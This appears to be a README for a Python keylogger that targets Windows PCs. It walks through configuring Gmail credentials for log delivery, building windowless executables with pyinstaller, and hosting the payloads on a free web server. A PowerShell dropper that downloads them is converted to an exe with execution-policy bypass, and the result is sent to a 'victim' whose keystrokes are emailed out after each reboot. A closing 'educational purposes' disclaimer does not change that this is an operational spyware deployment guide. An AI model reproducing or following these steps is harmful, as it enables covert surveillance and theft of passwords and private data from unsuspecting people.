
its a keylogger to monitor windwos pc

Primary LanguagePython


its a keylogger to monitor windwos pc

code no more maintained

how to setup :

first run setup.py

if setup.py not working then manully type :pip install pyinstaller ( if you have error pip is not internal command then open your cmd and change dir into python27 folder then scripts folder now type: pip.exe install pyinstaller)

open sys32.py and add your gmail address where all logs you will get recived into lino no 11 and 12 link and then add your gmail password into link no 37 and then save this file

now open up ur browser and go to 5gbfee.com

create a account here its easy

then convert sys32.py into sys32.exe using pyinstaller module ( open cmd and change your dir in to thats folder whre is your sys32 saved now type: pyinstaller --noconsole --onefile sys32.py)

then convert logger.py into logger.exe using pyinstaller module ( open cmd and change your dir in to thats folder whre is your logger saved now type: pyinstaller --noconsole --onefile logger.py)

now upload this sys32.exe and logger.exe into your 5gbfree website and copy the link with the full path of sys32.exe and logger.exe where is located in web server

and now open lucifer.ps1 and replace the file link with your file sys32.exe and logger.exe link you just uploaded

and unzip ps2exe-v5.0.0.zip and now open your windows powershell and change dir into thast folder and file this command: powershell -ExecutionPolicy ByPass -File ps2exe.ps1 -noconsole -inputFile C:\youpoweshell dropper file location here -outputFile C:\where you want to save your exe

now send this exe file to your victim so when your click it its will start capturing your all keystrokes and whenever victim restart his pc you will get his all keystrokes as a text format in your email address

its only for educational purposes i am not responsable for any kind of harm and damage